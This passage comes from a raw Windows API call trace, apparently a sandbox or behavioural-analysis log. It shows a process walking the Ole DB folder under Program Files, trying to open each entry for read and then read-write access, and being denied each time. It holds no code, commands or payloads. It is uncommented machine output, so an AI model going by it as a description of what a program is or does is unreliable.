lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6c, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a9b8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6c, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sa", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓簀")) returned 0 [0088.743] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0088.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0088.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0088.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0088.744] AreFileApisANSI () returned 1 [0088.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB", lpUsedDefaultChar=0x0) returned 44 [0088.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.744] AreFileApisANSI () returned 1 [0088.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0088.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x58) returned 0x678a0 [0088.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=44 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB") returned 44 [0088.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB" (normalized: "c:\\program files\\common files\\system\\ole db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.744] GetLastError () returned 0x5 [0088.744] GetLastError () returned 0x5 [0088.744] SetLastError (dwErrCode=0x5) [0088.744] GetLastError () returned 0x5 [0088.744] SetLastError (dwErrCode=0x5) [0088.744] GetLastError () returned 0x5 [0088.745] SetLastError (dwErrCode=0x5) [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x678a0 | out: hHeap=0x20000) returned 1 [0088.745] AreFileApisANSI () returned 1 [0088.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0088.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x58) returned 0x670c0 [0088.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=44 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB") returned 44 [0088.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB" (normalized: "c:\\program files\\common files\\system\\ole db"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.745] GetLastError () returned 0x5 [0088.745] GetLastError () returned 0x5 [0088.745] SetLastError (dwErrCode=0x5) [0088.745] GetLastError () returned 0x5 [0088.745] SetLastError (dwErrCode=0x5) [0088.745] GetLastError () returned 0x5 [0088.745] SetLastError (dwErrCode=0x5) [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0088.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0088.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.745] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0088.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.746] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0088.747] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.747] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d8245b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0088.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.747] AreFileApisANSI () returned 1 [0088.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpUsedDefaultChar=0x0) returned 50 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.748] AreFileApisANSI () returned 1 [0088.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0088.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46828 [0088.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 50 [0088.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.748] GetLastError () returned 0x5 [0088.748] GetLastError () returned 0x5 [0088.748] SetLastError (dwErrCode=0x5) [0088.748] GetLastError () returned 0x5 [0088.748] SetLastError (dwErrCode=0x5) [0088.748] GetLastError () returned 0x5 [0088.748] SetLastError (dwErrCode=0x5) [0088.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0088.748] AreFileApisANSI () returned 1 [0088.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0088.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e88 [0088.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 50 [0088.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.749] GetLastError () returned 0x5 [0088.749] GetLastError () returned 0x5 [0088.749] SetLastError (dwErrCode=0x5) [0088.749] GetLastError () returned 0x5 [0088.749] SetLastError (dwErrCode=0x5) [0088.749] GetLastError () returned 0x5 [0088.749] SetLastError (dwErrCode=0x5) [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0088.749] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0088.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0088.750] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x785d0 [0088.891] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d8245b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.892] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0088.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0088.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0088.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0088.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 